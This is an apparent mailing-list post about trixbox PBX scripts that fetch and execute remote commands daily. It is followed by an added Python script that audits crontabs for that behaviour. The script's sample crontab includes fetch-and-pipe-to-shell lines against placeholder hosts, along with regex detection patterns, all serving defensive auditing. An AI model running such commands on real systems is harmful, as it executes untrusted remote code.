Than Taro
2007-Dec-16 04:42 UTC
[asterisk-users] Trixbox Arbitrary Command Execution Vulnerability
A set of scripts was recently discovered in the trixbox line of PBX products, which connect to a remote host every 24 hours to retrieve an arbitrary list of commands to be executed locally. These scripts were added under the guise of submitting 'anonymous usage statistics'; however, with the help of DNS pollution, or malice on the part of the sponsoring company (Fonality), all up-to-date versions of trixbox could be instantly disabled, or worse.

According to trixbox Community Director, Kerry Gerrison, a new version of trixbox will be available by December 18th which will allow you to 'opt-out' (meaning that it will still be enabled by default) of this behavior.

Further details:
http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home
http://www.trixbox.org/trixboxs-new-hardware-audting-tool
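For administrators who want to check a system for the class of behaviour described in the message above (a scheduled job that retrieves content from a remote host and executes it), the following is an added example, not code from the original post or from trixbox. It assumes the job is scheduled through a system crontab (with a user field); the sample crontab and its host names are constructed, and `parse_jobs` and `audit` are hypothetical helper names.

```python
import re

# Tools that pull content from a remote host.
FETCH = re.compile(r"\b(wget|curl|fetch|lynx)\b")
# Signs that fetched content is executed rather than only stored:
# piped or chained into a shell, or passed to eval.
EXEC = re.compile(r"(\||&&|;)\s*(sudo\s+)?(ba|da|k|z)?sh\b|\beval\b")

def parse_jobs(crontab_text):
    """Yield (line_no, schedule, command) for each job in system-crontab text."""
    for no, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue  # blank line, comment, or environment assignment
        if line.startswith("@"):
            parts = line.split(None, 2)   # @daily user command
            if len(parts) == 3:
                yield no, parts[0], parts[2]
        else:
            parts = line.split(None, 6)   # m h dom mon dow user command
            if len(parts) == 7:
                yield no, " ".join(parts[:5]), parts[6]

def audit(crontab_text):
    """Return findings for jobs that fetch remote content and execute it."""
    findings = []
    for no, schedule, command in parse_jobs(crontab_text):
        if FETCH.search(command) and EXEC.search(command):
            findings.append({"line": no, "schedule": schedule, "command": command})
    return findings

# Constructed sample crontab (hosts under .invalid never resolve).
SAMPLE = """\
# constructed sample, not taken from any real system
MAILTO=root
17 4 * * * root /usr/sbin/logrotate /etc/logrotate.conf
@daily root wget -q -O - http://stats.example.invalid/cmds | sh
30 2 * * * root curl -s http://mirror.example.invalid/list.txt -o /var/tmp/list.txt
0 5 * * * root wget -q -O /tmp/run http://stats.example.invalid/run && sh /tmp/run
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"line {f['line']} [{f['schedule']}]: {f['command']}")
```

This only inspects the command text in the crontab itself; a job that calls a local script needs the same check run over that script's contents.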